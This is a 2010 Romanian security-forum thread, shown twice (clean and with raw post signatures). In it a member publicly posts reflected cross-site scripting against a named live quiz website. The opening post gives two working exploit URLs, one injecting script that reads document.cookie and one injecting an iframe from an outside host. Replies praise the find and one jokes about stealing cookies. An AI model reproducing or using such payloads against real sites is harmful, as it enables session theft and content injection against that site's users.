www.conquiztador.ro - Romanian Security Team

Ne0h · 01-04-2010, 12:18 PM

XSS Screen:

Proof of Concept:

Code:

http://www.conquiztador.ro/clientstart.php?tg=1&whall=1%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(document.cookie)%3B%3C/ScRiPt%3E

Iframe Screen:

Iframe Injection:

Code:

http://www.conquiztador.ro/clientstart.php?tg=1&whall=1%22%3E%3Ciframe%20src=http://ne0h.baywords.com%3E%3C/iframe%3E

immun3 · 01-04-2010, 12:43 PM

foarte tare

go_sword · 01-04-2010, 01:46 PM

o nu..nu iarasi conquiztador..nuuu
anyway..bv

Ne0h · 01-04-2010, 01:51 PM

Mersi frumos.

Hertz · 01-04-2010, 02:32 PM

Mai joaca cineva conpizdador?
Hai sa furam cookieuri nu. =]

Ne0h · 01-04-2010, 02:51 PM

Era mai interesant un SQLi,dar nu mai sunt,sau cel putin nu am mai gasit eu.

)

SympleBoy22 · 01-04-2010, 04:52 PM

Asta face parte din xss-urile alea de care mi-ai zis?

Ne0h · 01-04-2010, 05:05 PM

Nu,astazi l-am gasit.

SirGod · 01-04-2010, 05:11 PM

Si ma rog de ce faci si un PoC cu iframe?Ce vrei sa demonstrezi cu aia?Care isi e rostul?Am vazut ca e XSS.Nu trebuie sa bagi iframe,marquee si altele.

Ne0h · 01-04-2010, 05:22 PM

Nu toti stiu si de iframe asa ca il adaug si pe el,nu deranjeaza pe nimeni.Sau te deranjeaza?

01-04-2010, 12:18 PM	#1 (permalink)
Ne0h Registered user Bautor de whiskey Join Date: Aug 2009 Posts: 387 Rep Power: 1	www.conquiztador.ro hotel regim hotelier hotel yahoo domain XSS Screen: Proof of Concept: Code: http://www.conquiztador.ro/clientstart.php?tg=1&whall=1%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(document.cookie)%3B%3C/ScRiPt%3E Iframe Screen: Iframe Injection: Code: http://www.conquiztador.ro/clientstart.php?tg=1&whall=1%22%3E%3Ciframe%20src=http://ne0h.baywords.com%3E%3C/iframe%3E __________________ "Social engineering bypasses all technologies, including firewalls."

01-04-2010, 01:46 PM	#3 (permalink)
go_sword Registered Users Bautor de whiskey Join Date: Nov 2006 Posts: 333 Rep Power: 4	o nu..nu iarasi conquiztador..nuuu anyway..bv __________________ // Prea mare

01-04-2010, 01:51 PM	#4 (permalink)
Ne0h Registered user Bautor de whiskey Join Date: Aug 2009 Posts: 387 Rep Power: 1	Mersi frumos. __________________ "Social engineering bypasses all technologies, including firewalls."

01-04-2010, 02:32 PM	#5 (permalink)
Hertz Registered Users Cultul betivilor Join Date: Feb 2008 Location: Romania Posts: 1,089 Rep Power: 0	Mai joaca cineva conpizdador? Hai sa furam cookieuri nu. =] __________________ K: (x)html,css,javascript,ajax,c++,php,python,perl, ASM,action script 3.0,SQL, C#,Visual Basic,JAVA http://x0hertz.wordpress.com/

01-04-2010, 02:51 PM	#6 (permalink)
Ne0h Registered user Bautor de whiskey Join Date: Aug 2009 Posts: 387 Rep Power: 1	Era mai interesant un SQLi,dar nu mai sunt,sau cel putin nu am mai gasit eu. ) __________________ "Social engineering bypasses all technologies, including firewalls."

01-04-2010, 12:43 PM	#2 (permalink)
immun3 Registered Users Bautor de vin Join Date: May 2008 Posts: 80 Rep Power: 2	foarte tare

01-04-2010, 04:52 PM	#7 (permalink)
SympleBoy22 Registered user Cultul betivilor Join Date: Sep 2009 Location: htdocs Posts: 1,065 Rep Power: 2	Asta face parte din xss-urile alea de care mi-ai zis? __________________ Never underestimate your own ignorance. - Albert Einstein

01-04-2010, 05:05 PM	#8 (permalink)
Ne0h Registered user Bautor de whiskey Join Date: Aug 2009 Posts: 387 Rep Power: 1	Nu,astazi l-am gasit. __________________ "Social engineering bypasses all technologies, including firewalls."

01-04-2010, 05:11 PM	#9 (permalink)
SirGod Registered Users Bautor de whiskey Join Date: Nov 2007 Location: Rm.Valcea Posts: 307 Rep Power: 3	Si ma rog de ce faci si un PoC cu iframe?Ce vrei sa demonstrezi cu aia?Care isi e rostul?Am vazut ca e XSS.Nu trebuie sa bagi iframe,marquee si altele. __________________

01-04-2010, 05:22 PM	#10 (permalink)
Ne0h Registered user Bautor de whiskey Join Date: Aug 2009 Posts: 387 Rep Power: 1	Nu toti stiu si de iframe asa ca il adaug si pe el,nu deranjeaza pe nimeni.Sau te deranjeaza? __________________ "Social engineering bypasses all technologies, including firewalls."